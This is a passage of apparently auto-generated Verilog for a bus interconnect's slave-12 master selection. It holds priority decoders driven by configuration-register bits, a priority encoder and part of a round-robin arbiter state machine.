            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'h1 ) 
                begin
                    s12_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'h2 ) 
                    begin
                        s12_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s12_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[3] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[3]) ) 
        begin
            s12_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s12_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[4] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[4]) ) 
        begin
            s12_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'h1 ) 
                begin
                    s12_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'h2 ) 
                    begin
                        s12_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s12_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[4] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[4]) ) 
        begin
            s12_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s12_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[5] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[5]) ) 
        begin
            s12_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'h1 ) 
                begin
                    s12_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'h2 ) 
                    begin
                        s12_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s12_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[5] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[5]) ) 
        begin
            s12_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s12_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[6] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[6]) ) 
        begin
            s12_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'h1 ) 
                begin
                    s12_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'h2 ) 
                    begin
                        s12_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s12_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[6] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[6]) ) 
        begin
            s12_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s12_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[7] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[7]) ) 
        begin
            s12_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'h1 ) 
                begin
                    s12_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'h2 ) 
                    begin
                        s12_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s12_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s12_msel_pri_enc_valid[7] or  { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) })
    begin
        if (  !( s12_msel_pri_enc_valid[7]) ) 
        begin
            s12_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'h0 ) 
            begin
                s12_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s12_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s12_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s12_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd0_pri_out_d0 ) : ( s12_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s12_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd1_pri_out_d0 ) : ( s12_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd2_pri_out_d0 ) : ( s12_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd3_pri_out_d0 ) : ( s12_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd4_pri_out_d0 ) : ( s12_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd5_pri_out_d0 ) : ( s12_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd6_pri_out_d0 ) : ( s12_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd7_pri_out_d0 ) : ( s12_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s12_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd0_pri_out_d0 ) : ( s12_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s12_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd1_pri_out_d0 ) : ( s12_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd2_pri_out_d0 ) : ( s12_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd3_pri_out_d0 ) : ( s12_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd4_pri_out_d0 ) : ( s12_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd5_pri_out_d0 ) : ( s12_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd6_pri_out_d0 ) : ( s12_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd7_pri_out_d0 ) : ( s12_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s12_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s12_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s12_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s12_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s12_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s12_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s12_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s12_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd0_pri_out_d0 ) : ( s12_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s12_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd1_pri_out_d0 ) : ( s12_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd2_pri_out_d0 ) : ( s12_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd3_pri_out_d0 ) : ( s12_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd4_pri_out_d0 ) : ( s12_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd5_pri_out_d0 ) : ( s12_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd6_pri_out_d0 ) : ( s12_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s12_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s12_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s12_msel_pri_enc_pd7_pri_out_d0 ) : ( s12_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s12_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s12_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s12_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s12_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s12_next ) 
            begin
                s12_msel_pri_out <= ( ( ( s12_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s12_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s12_msel_pri_enc_pri_out0 ) : ( s12_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s12_msel_arb0_req = { ( s12_msel_req[7] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'd0 ) ), ( s12_msel_req[6] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'd0 ) ), ( s12_msel_req[5] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'd0 ) ), ( s12_msel_req[4] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'd0 ) ), ( s12_msel_req[3] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'd0 ) ), ( s12_msel_req[2] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'd0 ) ), ( s12_msel_req[1] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'd0 ) ), ( s12_msel_req[0] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'd0 ) ) };
    assign s12_msel_arb0_gnt = s12_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s12_msel_arb0_state <= s12_msel_arb0_grant0;
        end
        else
        begin 
            s12_msel_arb0_state <= s12_msel_arb0_next_state;
        end
    end
    always @ (  s12_msel_arb0_state or  { ( s12_msel_req[7] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[15] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[14] ) ) } == 2'd0 ) ), ( s12_msel_req[6] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[13] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[12] ) ) } == 2'd0 ) ), ( s12_msel_req[5] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[11] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[10] ) ) } == 2'd0 ) ), ( s12_msel_req[4] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[9] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[8] ) ) } == 2'd0 ) ), ( s12_msel_req[3] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[7] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[6] ) ) } == 2'd0 ) ), ( s12_msel_req[2] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[5] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[4] ) ) } == 2'd0 ) ), ( s12_msel_req[1] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[3] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[2] ) ) } == 2'd0 ) ), ( s12_msel_req[0] & ( { ( ( ( s12_msel_pri_sel == 2'd2 ) ) ? ( rf_conf12[1] ) : ( 1'b0 ) ), ( ( ( s12_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf12[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s12_msel_arb0_next_state = s12_msel_arb0_state;
        case ( s12_msel_arb0_state ) 
        s12_msel_arb0_grant0:
        begin
            if (  !( s12_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s12_msel_arb0_req[1] ) 
                begin
                    s12_msel_arb0_next_state = s12_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s12_msel_arb0_req[2] ) 
                    begin
                        s12_msel_arb0_next_state = s12_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s12_msel_arb0_req[3] ) 
                        begin
                            s12_msel_arb0_next_state = s12_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s12_msel_arb0_req[4] ) 
                            begin
                                s12_msel_arb0_next_state = s12_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s12_msel_arb0_req[5] ) 
                                begin
                                    s12_msel_arb0_next_state = s12_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb0_req[6] ) 
                                    begin
                                        s12_msel_arb0_next_state = s12_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb0_req[7] ) 
                                        begin
                                            s12_msel_arb0_next_state = s12_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb0_grant1:
        begin
            if (  !( s12_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s12_msel_arb0_req[2] ) 
                begin
                    s12_msel_arb0_next_state = s12_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s12_msel_arb0_req[3] ) 
                    begin
                        s12_msel_arb0_next_state = s12_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s12_msel_arb0_req[4] ) 
                        begin
                            s12_msel_arb0_next_state = s12_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s12_msel_arb0_req[5] ) 
                            begin
                                s12_msel_arb0_next_state = s12_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s12_msel_arb0_req[6] ) 
                                begin
                                    s12_msel_arb0_next_state = s12_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb0_req[7] ) 
                                    begin
                                        s12_msel_arb0_next_state = s12_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb0_req[0] ) 
                                        begin
                                            s12_msel_arb0_next_state = s12_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb0_grant2:
        begin
            if (  !( s12_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s12_msel_arb0_req[3] ) 
                begin
                    s12_msel_arb0_next_state = s12_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s12_msel_arb0_req[4] ) 
                    begin
                        s12_msel_arb0_next_state = s12_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s12_msel_arb0_req[5] ) 
                        begin
                            s12_msel_arb0_next_state = s12_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s12_msel_arb0_req[6] ) 
                            begin
                                s12_msel_arb0_next_state = s12_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s12_msel_arb0_req[7] ) 
                                begin
                                    s12_msel_arb0_next_state = s12_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s12_msel_arb0_req[0] ) 
                                    begin
                                        s12_msel_arb0_next_state = s12_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s12_msel_arb0_req[1] ) 
                                        begin
                                            s12_msel_arb0_next_state = s12_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s12_msel_arb0_grant3:
        begin
            if (  !( s12_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s12_msel_arb0_req[4] ) 
                begin
                    s12_msel_arb0_next_state = s12_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s12_msel_arb0_req[5] ) 
                    begin
